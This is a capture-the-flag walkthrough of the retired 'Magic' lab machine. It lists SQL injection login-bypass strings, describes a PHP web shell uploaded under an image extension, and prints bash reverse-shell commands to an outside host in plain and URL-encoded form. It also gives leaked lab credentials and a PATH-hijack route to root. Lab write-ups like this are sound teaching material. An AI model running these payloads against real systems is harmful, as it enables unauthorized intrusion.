Magic machine is a vulnerable machine with Linux operating system among retired machines. We are expected to obtain user and root flags by using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic scan
Ful port scan
As a result of port scanning, 22/tcp ssh OpenSSH 7.6p1 and 80/tcp http Apache ports are open.
Let’s provide enumeration over port 80
Here we provided enumueraion on the web, we looked at the wpanalayzer and examined the source codes, but the only notable thing here was that there was a login page
We started a gobuster scan to detect hidden files and directories to see what might be lurking.
Gobuster scan
We did not get any results in the Gobuster scan.
Let’s go to login.php page here
Here comes the login screen, we looked at the source code etc. We did not see any interesting information. This is the input field where we enter the default credential information. We have not logged in, we first try sql injection attack to break this place
admin’or 1=1;– – –
admin’or’1=1;#
1’or’1’=1′))
admin’#
admin’– – –
We were able to make a successful entry here.
We encountered the upload page
Let’s test the file upload area here, a place that works in php code
We tried to create and upload any file with Touch
As far as we understand here file accepts jpg, jpeg png file lengths, let’s see how to bypass it
First, let’s add an additional esxtension to the file
I agreed to add png at the end
Let’s try here by adding the png at the end
filetest.php.png accepted when I uploaded the soy as filetest.php.png Let’s add a php shell screen by adding a comment to a png file here.
Then we wrote oho in front of the png extension to read this png file as php and uploaded it
Let’s go to the area where we uploaded the file
Here we added ? cmd=id to the url part and it gave us the id value
I’m trying to get him to give us a revershell
/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.19/4747 0>&1’
We use the command but it didn’t work because it was empty etc. so we encoded the url
http://10.10.10.185/images/uploads/shell.php.png?cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.19%2F4747%200%3E%261%27
and we got it and we made a request
this is how we got Shell
In this shell we see that our authorization is limited, we provide local enumueration
We did not find any interesting information on Linpeas.sh. Here we continue with manual local emueration.
Here we have obtained the credetial information from the db.php5 file.
theseus:iamkingtheseus
We tried to change the user using this credental information and could not log in because it was incorrect.
Here we understand that mysql is running inside, let’s look at the network connections running inside to make sure of this
We made sure we saw port 3306
Here when trying to connect to myqsl it was saying that there was no mysql
Here we typed mysql and pressed tab twice to see the installed mysql
Here we were able to get the dubp of the db after a little work with the show and dump options.
Here we have obtained credential information
theseus:Th3s3usW4sK1ng
Let’s change authorization using the password
We have successfully obtained the user flag, but we still do not have root privileges.
So let’s continue with local enumeration
The /bin/sysinfo file gives information about the system
Here in the MEM Usage section, the free command is running, we will manipulate this free command to run bash, let’s try to get root authorization in this way
We couldn’t get the printout here
I think the commands are getting confused so I’ll ask him to give me a revershell here
bash -i >& /dev/tcp/10.10.14.19/1234 0>&1
I type the command
This is how we got root privileges